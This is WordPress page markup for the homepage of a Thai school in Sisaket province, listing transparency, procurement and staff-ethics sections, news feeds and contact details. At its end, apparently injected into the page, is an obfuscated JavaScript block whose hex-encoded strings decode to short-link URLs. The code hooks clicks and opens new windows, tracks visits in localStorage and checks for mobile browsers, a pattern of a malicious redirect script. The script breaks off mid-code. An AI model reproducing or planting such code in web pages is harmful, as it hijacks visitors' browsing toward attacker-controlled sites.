900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 